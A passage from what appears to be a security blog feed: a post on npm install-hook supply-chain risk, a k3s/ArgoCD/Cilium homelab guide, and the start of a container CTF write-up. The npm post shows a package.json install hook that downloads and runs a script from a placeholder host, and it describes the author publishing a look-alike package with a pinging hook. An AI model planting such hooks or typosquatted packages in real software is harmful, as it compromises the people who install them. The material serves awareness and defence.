<code>latest</code> tag by default</li> <li>npm downloads the tarball from the public npm registry (unless registry is already set in <code>.npmrc</code>)</li> <li>the tarball is extracted to <code>node_modules</code></li> <li>npm reads the <code>package.json</code> and resolves each of the transitive dependencies similarly</li> <li>Depending on the <code>package.json</code>, a set of lifecycle hooks are run</li> <li>The package-lock.json is updated</li> </ol> <h2 id="hooks">hooks</h2> <p>Step 5 is where things get interesting. There exist certain <a href="https://docs.npmjs.com/cli/v8/using-npm/scripts#life-cycle-operation-order">special lifecycle hooks</a> (basically scripts) that run only at specified stages of the <code>npm install</code> process:</p> <ul> <li>preinstall</li> <li>install</li> <li>postinstall</li> </ul> <p>The cool/dangerous thing is that the package publisher may choose what those scripts contain! For example, here&rsquo;s a noisy <code>package.json</code> that is sure to light up every scanner and its grandmother:</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-json" data-lang="json"><span class="line"><span class="cl"><span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nt">&#34;name&#34;</span><span class="p">:</span> <span class="s2">&#34;my-tools&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="nt">&#34;version&#34;</span><span class="p">:</span> <span class="s2">&#34;1.0.0&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="nt">&#34;scripts&#34;</span><span class="p">:</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nt">&#34;install&#34;</span><span class="p">:</span> <span class="s2">&#34;echo \&#34;Running custom install step\&#34; &amp;&amp; curl -o harmless.sh http://random-ip/a &amp;&amp; sh harmless.sh&#34;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span></code></pre></div><p>The above script runs during installation. Similarly preinstall and postinstall are executed before and after the install.</p> <h2 id="publishing-a-look-alike-package-for-research">publishing a look-alike package for research</h2> <p>A few months ago, curious to see how it would work in practice I published a package with a name similar to one released by a prominent organization. While it contained the original source code of the legit package, it also had something extra: an install hook that sent a ping to a public websocket. Mind you, all I wanted to see was how often people made mistakes and how many of these mistakes were part of CI pipelines. To my surprise within 5 minutes I received over 20 hits! I realized how fragile the npm ecosystem is.</p> <p><img src="https://zerodaywolf.sh/gallery/npm-lifecycle-hooks/01-hits.png" alt=""></p> <p>I was waiting for the package to be flagged as malicious, but it never happened. After a while, I removed it myself. I&rsquo;d assumed no scanner found the script to be malicious because all it did was send a HTTP GET request.. but I was unsatisfied with that theory.</p> <p>Now this was just some package that was abandoned for almost four years. I shudder to think what the risk looks like for actively maintained projects.</p> <h2 id="data-exfiltration-and-persistence">data exfiltration and persistence</h2> <p>Once there&rsquo;s code execution on the machine, there are a gazillion ways to persist/elevate access. Writing to shell config files, editing the PATH environment variable, overwriting other npm modules are just a few.</p> <p>A more common tactic involves malware that exfiltrates secrets and private keys from workstations, servers, and CI/CD runners and then using these secrets to gain access to entire organization repositories or popular packages. The recent attack on the <a href="https://semgrep.dev/blog/2025/security-alert-nx-compromised-to-steal-wallets-and-credentials/">nx package used a similar postinstall hook</a> that scanned the entire file system for credentials and uploaded them to a new Github repository on the affected user&rsquo;s account called <code>s1ngularity</code> or <code>s1ngularity-repository</code>. The script even leveraged LLMs like Claude, Q and Gemini via CLI.</p> <p>This has been going on for over a <strong>decade</strong> now with packages like eslint, eslint-plugin-prettier, synckit also being affected in the past. The malware referenced by these lifecycle scripts is usually obfuscated, encoded or encrypted to prevent detection.</p> <h2 id="prevention">prevention</h2> <ul> <li>Always ensure you&rsquo;re verifying the scripts in the <code>package.json</code> before pulling.</li> <li>Use <code>--ignore-scripts</code> while testing new packages</li> <li>Avoid pulling packages that were: <ul> <li>published less than 72 hours ago</li> <li>Have a single owner/maintainer</li> <li>Had less than 300 downloads over the last week</li> </ul> </li> <li>Pin the dependency&rsquo;s version in your package-lock.json and avoid pulling the latest tag.</li> <li>If you are part of an organization, using a proxy like <a href="https://github.com/verdaccio/verdaccio">Verdaccio</a> for the NPM registry with an allowlist is recommended.</li> </ul>Bootstrapping k3s with ArgoCD, Cilium, and MetalLBhttps://zerodaywolf.sh/blog/multi-node-k3s-build/Sat, 06 Sep 2025 01:40:58 +0530<p>For a long time I ran a vanilla Kubernetes cluster (kubeadm) as a single-node setup on my HP Elitedesk 800 G2 SFF running Debian. It got the job done, but the hardware always felt under-utilized, and I wanted a more realistic, production-like environment to experiment with high availability, scaling, and needed better resource usage.</p> <p>Cut to last weekend: I finally installed Proxmox (something <a href="https://www.linkedin.com/in/sujeeth-ap/">Sujeeth</a> has been nudging me to do for ages), and my homelab instantly felt like it had levelled up! VNets, snapshots, easy VM management… I was pumped!</p> <h3 id="access-setup">Access Setup</h3> <p>My goal was to replace that lonely single-node with a lightweight, multi-node k3s cluster. Fun fact: In a K3s cluster, you won’t spot separate pods for the API server, kube-proxy, or kube-controller-manager in kube-system. Why? Because k3s packs them all into a single tiny binary!</p> <p>My setup consisted of:</p> <ul> <li>one control plane node</li> <li>two worker nodes</li> </ul> <p>All three VMs lived inside an isolated Proxmox VNet, so there was no direct way to reach them, and I <strong>really</strong> didn’t feel like dealing with port forwarding or performing unnecessary wireguard gymnastics. So I did what any sleep-deprived, sane person would do at 2.30 AM, so I installed Tailscale on the control plane. From there, I could hop into the worker nodes via SSH whenever I needed. That extra access was purely for convenience during setup, because, honestly, I’ll take SSH over clunky VNC any day.</p> <h3 id="k3s-installation-1-server-2-agents">k3s installation (1 server, 2 agents)</h3> <p>k3s ships with Traefik by default, but I’m more comfortable managing nginx, and since I plan to move toward Gateway API later, it didn’t make sense to invest effort in a setup I’d eventually replace.</p> <p>I’d worked with Calico before and found it solid, but I always wanted to try Cilium because of its eBPF-powered approach to networking and security. This was a good time to make the switch.</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl">curl -sfL https://get.k3s.io <span class="p">|</span> <span class="nv">INSTALL_K3S_EXEC</span><span class="o">=</span><span class="s1">&#39;--flannel-backend=none --disable=traefik --disable-network-policy&#39;</span> sh - </span></span></code></pre></div><p>The k3s install was pretty much <a href="https://docs.cilium.io/en/stable/installation/k3s/">straightforward</a>, albeit not without its own quirks. At first, the agents couldn’t resolve <code>K3S_URL</code> https://controlplane:6443 during bootstrap, so I fell back to the node’s IP:</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl"><span class="c1"># didn’t work</span> </span></span><span class="line"><span class="cl">curl -sfL https://get.k3s.io <span class="p">|</span> <span class="nv">K3S_URL</span><span class="o">=</span>https://controlplane:6443 <span class="nv">K3S_TOKEN</span><span class="o">=</span>mynodetoken sh - </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1"># worked</span> </span></span><span class="line"><span class="cl">curl -sfL https://get.k3s.io <span class="p">|</span> <span class="nv">K3S_URL</span><span class="o">=</span>https://192.168.1.10:6443 <span class="nv">K3S_TOKEN</span><span class="o">=</span>mynodetoken sh - </span></span></code></pre></div><p>Once that clicked, the cluster was alive! Well almost.</p> <h3 id="cilium-for-networking-fun">Cilium for Networking Fun</h3> <p>Installing the cilium CLI was painless: I grabbed the latest version, verified the checksums, dropped the binary into <code>/usr/local/bin</code>, and got rolling:</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl"><span class="nv">CILIUM_CLI_VERSION</span><span class="o">=</span><span class="k">$(</span>curl -s https://raw.githubusercontent.com/cilium/cilium-cli/main/stable.txt<span class="k">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nv">CLI_ARCH</span><span class="o">=</span>amd64 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">if</span> <span class="o">[</span> <span class="s2">&#34;</span><span class="k">$(</span>uname -m<span class="k">)</span><span class="s2">&#34;</span> <span class="o">=</span> <span class="s2">&#34;aarch64&#34;</span> <span class="o">]</span><span class="p">;</span> <span class="k">then</span> <span class="nv">CLI_ARCH</span><span class="o">=</span>arm64<span class="p">;</span> <span class="k">fi</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">curl -L --fail --remote-name-all https://github.com/cilium/cilium-cli/releases/download/<span class="si">${</span><span class="nv">CILIUM_CLI_VERSION</span><span class="si">}</span>/cilium-linux-<span class="si">${</span><span class="nv">CLI_ARCH</span><span class="si">}</span>.tar.gz<span class="o">{</span>,.sha256sum<span class="o">}</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">sha256sum --check cilium-linux-<span class="si">${</span><span class="nv">CLI_ARCH</span><span class="si">}</span>.tar.gz.sha256sum </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">sudo tar xzvfC cilium-linux-<span class="si">${</span><span class="nv">CLI_ARCH</span><span class="si">}</span>.tar.gz /usr/local/bin </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">rm cilium-linux-<span class="si">${</span><span class="nv">CLI_ARCH</span><span class="si">}</span>.tar.gz<span class="o">{</span>,.sha256sum<span class="o">}</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">cilium status --wait </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">cilium install --version 1.18.1 --set<span class="o">=</span>ipam.operator.clusterPoolIPv4PodCIDRList<span class="o">=</span><span class="s2">&#34;10.42.0.0/16&#34;</span> </span></span></code></pre></div><p>Seeing cilium status finally go green was a rush, pod networking was setup!</p> <h3 id="argocd--gitops-bliss">ArgoCD &amp; GitOps Bliss</h3> <p>ArgoCD <a href="https://argo-cd.readthedocs.io/en/stable/#quick-start">setup</a> was smooth. I hooked it to my GitOps repo and went with an <a href="https://argo-cd.readthedocs.io/en/latest/operator-manual/cluster-bootstrapping/#app-of-apps-pattern"><strong>App of Apps</strong></a> pattern.</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl">. </span></span><span class="line"><span class="cl">├── apps </span></span><span class="line"><span class="cl">│ ├── Chart.yaml </span></span><span class="line"><span class="cl">│ ├── templates </span></span><span class="line"><span class="cl">│ │ └── applications.yaml </span></span><span class="line"><span class="cl">│ └── values.yaml </span></span><span class="line"><span class="cl">├── cert-manager </span></span><span class="line"><span class="cl">│ └── clusterissuer.yml </span></span><span class="line"><span class="cl">├── clip </span></span><span class="line"><span class="cl">│ └── clip.yaml </span></span><span class="line"><span class="cl">├── external-dns </span></span><span class="line"><span class="cl">│ └── externaldns.yaml </span></span><span class="line"><span class="cl">├── metallb </span></span><span class="line"><span class="cl">│ └── config.yaml </span></span><span class="line"><span class="cl">├── vaultwarden </span></span><span class="line"><span class="cl">│ ├── Chart.yaml </span></span><span class="line"><span class="cl">│ ├── templates </span></span><span class="line"><span class="cl">│ │ ├── deployment.yaml </span></span><span class="line"><span class="cl">│ │ ├── _helpers.tpl </span></span><span class="line"><span class="cl">│ │ ├── ingress.yaml </span></span><span class="line"><span class="cl">│ │ ├── NOTES.txt </span></span><span class="line"><span class="cl">│ │ ├── pvc.yaml </span></span><span class="line"><span class="cl">│ │ ├── pv.yaml </span></span><span class="line"><span class="cl">│ │ ├── service.yaml </span></span><span class="line"><span class="cl">│ │ └── tests </span></span><span class="line"><span class="cl">│ │ └── test-connection.yaml </span></span><span class="line"><span class="cl">│ └── values.yaml </span></span><span class="line"><span class="cl">└── ytdlp-webui </span></span><span class="line"><span class="cl"> └── ytdlp-webui.yaml </span></span></code></pre></div><p>The cool part? Most of my apps were Helm charts from public repos. That meant I didn’t have to manually create tons of directories; almost everything was handled through the root values.yaml in my main app. Super tidy and easy to manage!</p> <p>Here&rsquo;s what the <code>applications.yaml</code> looked like:</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-yaml" data-lang="yaml"><span class="line"><span class="cl">{{- <span class="l">range .Values.applications }}</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"></span>{{- <span class="l">$config := $.Values.config -}}</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"></span><span class="nt">apiVersion</span><span class="p">:</span><span class="w"> </span><span class="l">argoproj.io/v1alpha1</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"></span><span class="nt">kind</span><span class="p">:</span><span class="w"> </span><span class="l">Application</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"></span><span class="nt">metadata</span><span class="p">:</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"> </span><span class="nt">name</span><span class="p">:</span><span class="w"> </span>{{<span class="w"> </span><span class="l">.name | quote }}</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"> </span><span class="nt">namespace</span><span class="p">:</span><span class="w"> </span><span class="l">argocd</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"></span><span class="nt">spec</span><span class="p">:</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"> </span><span class="nt">destination</span><span class="p">:</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"> </span><span class="nt">namespace</span><span class="p">:</span><span class="w"> </span>{{<span class="w"> </span><span class="l">.namespace | default .name | quote }}</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"> </span><span class="nt">server</span><span class="p">:</span><span class="w"> </span>{{<span class="w"> </span><span class="l">$config.spec.destination.server | quote }}</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"> </span><span class="nt">project</span><span class="p">:</span><span class="w"> </span><span class="l">default</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"> </span><span class="nt">source</span><span class="p">:</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"> </span><span class="nt">chart</span><span class="p">:</span><span class="w"> </span>{{<span class="w"> </span><span class="l">.chart }}</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"> </span><span class="nt">path</span><span class="p">:</span><span class="w"> </span>{{<span class="w"> </span><span class="l">.path | quote }}</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"> </span><span class="nt">repoURL</span><span class="p">:</span><span class="w"> </span>{{<span class="w"> </span><span class="l">.repoURL }}</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"> </span><span class="nt">targetRevision</span><span class="p">:</span><span class="w"> </span>{{<span class="w"> </span><span class="l">.targetRevision }}</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"> </span>{{- <span class="l">with .tool }}</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"> </span>{{- <span class="l">. | toYaml | nindent 4 }}</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"> </span>{{- <span class="l">end }}</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"> </span><span class="nt">syncPolicy</span><span class="p">:</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"> </span><span class="nt">syncOptions</span><span class="p">:</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"> </span>- <span class="l">CreateNamespace=true</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"> </span><span class="nt">automated</span><span class="p">:</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"> </span><span class="nt">prune</span><span class="p">:</span><span class="w"> </span><span class="kc">true</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"> </span><span class="nt">selfHeal</span><span class="p">:</span><span class="w"> </span><span class="kc">true</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"></span><span class="nn">---</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"></span>{{<span class="w"> </span><span class="l">end -}}</span><span class="w"> </span></span></span></code></pre></div><p>and here&rsquo;s a snippet of the <code>values.yaml</code>:</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-yaml" data-lang="yaml"><span class="line"><span class="cl"><span class="nt">config</span><span class="p">:</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"> </span><span class="nt">spec</span><span class="p">:</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"> </span><span class="nt">destination</span><span class="p">:</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"> </span><span class="nt">server</span><span class="p">:</span><span class="w"> </span><span class="l">https://kubernetes.default.svc</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"> </span><span class="nt">source</span><span class="p">:</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"> </span><span class="nt">targetRevision</span><span class="p">:</span><span class="w"> </span><span class="l">master</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"></span><span class="nt">applications</span><span class="p">:</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"> </span>- <span class="nt">name</span><span class="p">:</span><span class="w"> </span><span class="l">metallb</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"> </span><span class="nt">repoURL</span><span class="p">:</span><span class="w"> </span><span class="l">https://metallb.github.io/metallb</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"> </span><span class="nt">chart</span><span class="p">:</span><span class="w"> </span><span class="l">metallb</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"> </span><span class="nt">namespace</span><span class="p">:</span><span class="w"> </span><span class="l">metallb-system</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"> </span><span class="nt">targetRevision</span><span class="p">:</span><span class="w"> </span><span class="m">0.15.2</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"> </span><span class="nt">tool</span><span class="p">:</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"> </span><span class="nt">helm</span><span class="p">:</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"> </span><span class="nt">releaseName</span><span class="p">:</span><span class="w"> </span><span class="l">metallb</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"> </span>- <span class="nt">name</span><span class="p">:</span><span class="w"> </span><span class="l">cert-manager</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"></span><span class="p">[</span><span class="l">..SNIP..]</span><span class="w"> </span></span></span></code></pre></div><p>I connected my Git repo in ArgoCD, spun up the root app, enabled auto-sync, and then just sat back as the apps rolled themselves out. Watching everything come to life automatically was immensely satisfying.</p> <h3 id="ingress--load-balancing-magic">Ingress &amp; Load Balancing Magic</h3> <p>Without a cloud provider, Kubernetes marks <code>Service.status.loadBalancer.ingress</code> with every node IP (messy).</p> <p><img src="https://zerodaywolf.sh/gallery/moving-to-k3s/01-ingress-messy.png" alt=""></p> <p>This is normal on bare-metal Kubernetes: with no cloud load balancer, the service reports every node as a potential entry point. But it confused my DNS automation (ExternalDNS+Pihole). I needed something better.</p> <p>Enter <strong>MetalLB</strong>. Following <a href="https://metallb.io/installation/">the guide</a>, I configured Layer-2 mode (<a href="https://metallb.io/configuration/#layer-2-configuration">docs</a>). Suddenly, Services of type <code>LoadBalancer</code> got a <strong>single, clean IP</strong>. Goodbye multi-IP chaos!</p> <p><strong>Edit:</strong> A few days after sharing this blog, a Linkedin user pointed out that I could use Cilium instead of MetalLB as the load balancer. Turns out <a href="https://isovalent.com/blog/post/migrating-from-metallb-to-cilium/">MetalLB was used by Cilium in it&rsquo;s own CI/CD pipelines</a> before they decided to have less dependencies on other components and rolled out their own native Loadbalancer IPAM solution within Cilium in v1.13. Hence, I was able to replace it with the following IP pool:</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-yaml" data-lang="yaml"><span class="line"><span class="cl"><span class="nt">apiVersion</span><span class="p">:</span><span class="w"> </span><span class="s2">&#34;cilium.io/v2&#34;</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"></span><span class="nt">kind</span><span class="p">:</span><span class="w"> </span><span class="l">CiliumLoadBalancerIPPool</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"></span><span class="nt">metadata</span><span class="p">:</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"> </span><span class="nt">name</span><span class="p">:</span><span class="w"> </span><span class="s2">&#34;pool&#34;</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"></span><span class="nt">spec</span><span class="p">:</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"> </span><span class="nt">blocks</span><span class="p">:</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"> </span>- <span class="nt">cidr</span><span class="p">:</span><span class="w"> </span><span class="s2">&#34;100.x.x.y/32&#34;</span><span class="w"> </span></span></span></code></pre></div><h3 id="tailnet-integration">Tailnet Integration</h3> <p>Since I access the services over Tailscale, I installed the <a href="https://tailscale.com/kb/1236/kubernetes-operator#setup">Tailscale operator</a> to bring the cluster onto my Tailnet. After that, it was mostly housekeeping:</p> <ul> <li><a href="https://tailscale.com/kb/1440/kubernetes-operator-cloud-services">Expose</a> the two critical services on my Tailnet: DNS and the load balancer</li> <li>Configure split-DNS for my domain and point the tailnet’s nameservers to Pi-hole, so tailnet clients resolve internal services cleanly without ever touching my LAN’s resolver.</li> <li>Configure metallb to hand out its Tailscale IP to the LoadBalancer service (ingress-nginx)</li> </ul> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-yaml" data-lang="yaml"><span class="line"><span class="cl"><span class="nt">apiVersion</span><span class="p">:</span><span class="w"> </span><span class="l">metallb.io/v1beta1</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"></span><span class="nt">kind</span><span class="p">:</span><span class="w"> </span><span class="l">IPAddressPool</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"></span><span class="nt">metadata</span><span class="p">:</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"> </span><span class="nt">name</span><span class="p">:</span><span class="w"> </span><span class="l">default</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"> </span><span class="nt">namespace</span><span class="p">:</span><span class="w"> </span><span class="l">metallb-system</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"></span><span class="nt">spec</span><span class="p">:</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"> </span><span class="nt">addresses</span><span class="p">:</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"> </span>- <span class="m">100.</span><span class="l">x.x.y-100.x.x.y</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"> </span><span class="nt">autoAssign</span><span class="p">:</span><span class="w"> </span><span class="kc">true</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"></span><span class="nn">---</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"></span><span class="nt">apiVersion</span><span class="p">:</span><span class="w"> </span><span class="l">metallb.io/v1beta1</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"></span><span class="nt">kind</span><span class="p">:</span><span class="w"> </span><span class="l">L2Advertisement</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"></span><span class="nt">metadata</span><span class="p">:</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"> </span><span class="nt">name</span><span class="p">:</span><span class="w"> </span><span class="l">default</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"> </span><span class="nt">namespace</span><span class="p">:</span><span class="w"> </span><span class="l">metallb-system</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"></span><span class="nt">spec</span><span class="p">:</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"> </span><span class="nt">ipAddressPools</span><span class="p">:</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"> </span>- <span class="l">default</span><span class="w"> </span></span></span></code></pre></div><p>With everything in place, I synced all the applications, and that was it. The cluster services I needed were instantly reachable from any client in my tailnet.</p> <h3 id="wrapping-it-up">Wrapping It Up</h3> <p>Going from single-node kubeadm to multi-node K3s has been an absolute blast. My homelab finally feels alive, and pushing updates is so much easier now with GitOps keeping everything in sync automatically. MetalLB plus Tailscale makes the cluster accessible without ugly reverse proxies, and Cilium lets me tinker with the wild powers of eBPF!</p>Contain Me If You Can - The Ultimate Cloud Security Championshiphttps://zerodaywolf.sh/writeups/tucsc-ch02-contain-me-if-you-can/Fri, 01 Aug 2025 12:20:00 +0530<p><img src="https://zerodaywolf.sh/gallery/tuscs-contain-me-if-you-can/1.png" alt=""></p> <p>We have a shell inside a container. We check the established connections:</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">root@container:~# netstat </span></span><span class="line"><span class="cl">Active Internet connections <span class="o">(</span>w/o servers<span class="o">)</span> </span></span><span class="line"><span class="cl">Proto Recv-Q Send-Q Local Address Foreign Address State </span></span><span class="line"><span class="cl">tcp <span class="m">0</span> <span class="m">0</span> c04d7498020d:47748 postgres_db.:postgresql ESTABLISHED </span></span><span class="line"><span class="cl">tcp <span class="m">0</span> <span class="m">0</span> c04d7498020d:54216 postgres_db.:postgresql ESTABLISHED </span></span><span class="line"><span class="cl">Active UNIX domain sockets <span class="o">(</span>w/o servers<span class="o">)</span> </span></span><span class="line"><span class="cl">Proto RefCnt Flags Type State I-Node Path </span></span></code></pre></div><p>There’s one to a host <code>postgres_db</code> , which (based on the output of <code>arp -a</code>) is another container:</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-jsx" data-lang="jsx"><span class="line"><span class="cl"><span class="nx">root</span><span class="err">@</span><span class="nx">container</span><span class="o">:</span><span class="err">/# arp -a</span> </span></span><span class="line"><span class="cl"><span class="nx">postgres_db</span><span class="p">.</span><span class="nx">user_db_network</span> <span class="p">(</span><span class="mf">172.19.0.2</span><span class="p">)</span> <span class="nx">at</span> <span class="mi">02</span><span class="o">:</span><span class="mi">42</span><span class="o">:</span><span class="nx">ac</span><span class="o">:</span><span class="mi">13</span><span class="o">:</span><span class="mi">00</span><span class="o">:</span><span class="mi">02</span> <span class="p">[</span><span class="nx">ether</span><span class="p">]</span> <span class="nx">on</span> <span class="nx">eth0</span> </span></span></code></pre></div><p>There must be some application that’s running which created this connection. Let’s check the processes:</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">root@container:~# ps aux </span></span><span class="line"><span class="cl">USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND </span></span><span class="line"><span class="cl">root <span class="m">1</span> 0.0 0.0 <span class="m">2696</span> <span class="m">992</span> ? Ss 03:01 0:00 sleep infinity </span></span><span class="line"><span class="cl">root <span class="m">6</span> 0.0 0.3 <span class="m">4588</span> <span class="m">3988</span> pts/0 Ss 03:01 0:00 bash </span></span><span class="line"><span class="cl">root <span class="m">902</span> 0.0 0.3 <span class="m">7888</span> <span class="m">3980</span> pts/0 R+ 04:52 0:00 ps aux </span></span></code></pre></div><p>Nothing? It’s probably being run in a different process namespace (i.e. a different container or the host).</p> <p>Let’s see if there’s any traffic on this connection:</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-jsx" data-lang="jsx"><span class="line"><span class="cl"><span class="nx">root</span><span class="err">@</span><span class="nx">container</span><span class="o">:</span><span class="err">/# tcpdump -A port 5432</span> </span></span><span class="line"><span class="cl"><span class="mi">07</span><span class="o">:</span><span class="mi">42</span><span class="o">:</span><span class="mf">13.737304</span> <span class="nx">IP</span> <span class="mi">2</span><span class="nx">a97544bda27</span><span class="mf">.39682</span> <span class="o">&gt;</span> <span class="nx">postgres_db</span><span class="p">.</span><span class="nx">user_db_network</span><span class="p">.</span><span class="nx">postgresql</span><span class="o">:</span> <span class="nx">Flags</span> <span class="p">[</span><span class="nx">P</span><span class="p">.],</span> <span class="nx">seq</span> <span class="mi">1</span><span class="o">:</span><span class="mi">20</span><span class="p">,</span> <span class="nx">ack</span> <span class="mi">1</span><span class="p">,</span> <span class="nx">win</span> <span class="mi">501</span><span class="p">,</span> <span class="nx">options</span> <span class="p">[</span><span class="nx">nop</span><span class="p">,</span><span class="nx">nop</span><span class="p">,</span><span class="nx">TS</span> <span class="nx">val</span> <span class="mi">1427675159</span> <span class="nx">ecr</span> <span class="mi">1317731888</span><span class="p">],</span> <span class="nx">length</span> <span class="mi">19</span> </span></span><span class="line"><span class="cl"><span class="nx">E</span><span class="p">..</span><span class="nx">G</span><span class="p">..</span><span class="err">@</span><span class="p">...............</span><span class="mf">.8</span><span class="p">....</span><span class="nx">Bp8</span><span class="o">?</span><span class="p">....</span><span class="nx">Xe</span><span class="p">.....</span> </span></span><span class="line"><span class="cl"><span class="nx">U</span><span class="p">...</span><span class="nx">N</span><span class="p">.</span><span class="mf">.0</span><span class="nx">Q</span><span class="p">....</span><span class="nx">SELECT</span> <span class="nx">now</span><span class="p">();.</span> </span></span><span class="line"><span class="cl"><span class="mi">07</span><span class="o">:</span><span class="mi">42</span><span class="o">:</span><span class="mf">13.737874</span> <span class="nx">IP</span> <span class="nx">postgres_db</span><span class="p">.</span><span class="nx">user_db_network</span><span class="p">.</span><span class="nx">postgresql</span> <span class="o">&gt;</span> <span class="mi">2</span><span class="nx">a97544bda27</span><span class="mf">.39682</span><span class="o">:</span> <span class="nx">Flags</span> <span class="p">[</span><span class="nx">P</span><span class="p">.],</span> <span class="nx">seq</span> <span class="mi">1</span><span class="o">:</span><span class="mi">90</span><span class="p">,</span> <span class="nx">ack</span> <span class="mi">20</span><span class="p">,</span> <span class="nx">win</span> <span class="mi">509</span><span class="p">,</span> <span class="nx">options</span> <span class="p">[</span><span class="nx">nop</span><span class="p">,</span><span class="nx">nop</span><span class="p">,</span><span class="nx">TS</span> <span class="nx">val</span> <span class="mi">1317736572</span> <span class="nx">ecr</span> <span class="mi">1427675159</span><span class="p">],</span> <span class="nx">length</span> <span class="mi">89</span> </span></span><span class="line"><span class="cl"><span class="nx">E</span><span class="p">.....</span><span 